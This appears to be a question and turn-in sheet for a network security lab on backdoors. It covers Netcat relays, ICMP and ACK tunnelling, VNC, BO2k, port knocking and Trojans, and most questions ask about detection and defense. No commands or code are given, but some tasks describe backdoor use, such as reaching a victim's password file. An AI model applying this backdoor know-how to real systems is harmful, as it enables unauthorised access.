Q1.1.1. Is the binary file the same, or has it been altered? Compare the file sizes of the file on the two systems as it is transferred back and forth.
Q1.1.2. What can you say about Netcat's ability to transfer binary files?
Q1.1.3. What do you conclude from this?
Screenshot #1: Take a screenshot of these windows and submit it with your report.
Q1.1.4. Draw a diagram explaining how the relay works and the directions of data flow.
Q1.1.5. Aside from the four uses listed in this lab, Netcat can be used in many different ways. Suggest another way that Netcat could be used (in detail).
Q1.1.6. What defenses could you use against an attack like a Netcat backdoor?

Section 2
Screenshot #2: Take a screenshot of the Ethereal output.
Q2.1.1. What defenses could you use against an attack like an ICMP backdoor?

Section 3
Q3.1.1. How would you detect that VNC was installed and/or running on your Windows machine?
Q3.1.2. How would you detect that VNC was installed on your Linux machine?
Screenshots #3, #4: Take a screenshot of the VNC server screen and another of the VNC viewer accessing the VNC server. Turn these in with your report.
Q3.1.3. What defenses could you use against an attack like VNC?

Section 4
Screenshot #5: Submit a screenshot of BO2k successfully being used to gain access to the password file of the WinXP victim.

Section 5
Q5.1.1. What happens when you do what the email says?
Q5.2.2. What suggestions do you have about improving the security of such email programs?
Screenshot #6: Take a screenshot of the remote access over the telnet connection and the hacked login.
Screenshot #7: Turn in a screenshot of the new process created.
Screenshot #8: Screenshot of the popup box with the path of the nc.exe program and its command-line arguments.
Screenshot #9: Screenshot of the attacking machine running the ACK tunneling attack.

Section 9: Port Knocking
1) Create an access rule to allow an OpenBSD 3.3-3.5 box on the non-routable 10.0.0.0/8 subnet to access port 22 using an encrypted knock sequence.
2) It was mentioned that port knocking began with a virus. Why would a virus writer want to include port knocking in the backdoor?
3) No mention was made of how port knocking servers finally close the opened firewall port. List 2 ways that could be employed to close the port.

Section 10: Tricking users into opening backdoors
Q10.1.1. Does the notepad program appear after closing the calculator program?
Q10.1.2. Can you see notepad.exe in the processes window this time?
Q10.1.3. How do you detect a Trojan of this kind?

General Questions
How long did it take you to complete this lab? Was it an appropriate length lab?
What corrections and/or improvements do you suggest for this lab? You may cross out and edit the text of the lab on previous pages to make corrections. Please be very specific, and if you add new material, give the exact wording and instructions you would give to future students in the new lab handout. You need to be very specific and provide details. You need to actually do the suggested additions in the lab and provide solutions to your suggested additions.

Caution as usual: only extract and use the tools you downloaded in the safe and approved environment of the network security laboratory.

Turn-in Checklist
1- Screenshots 1 to 9.
2- Answer Sheet with answers.
3- Any additions for the lab.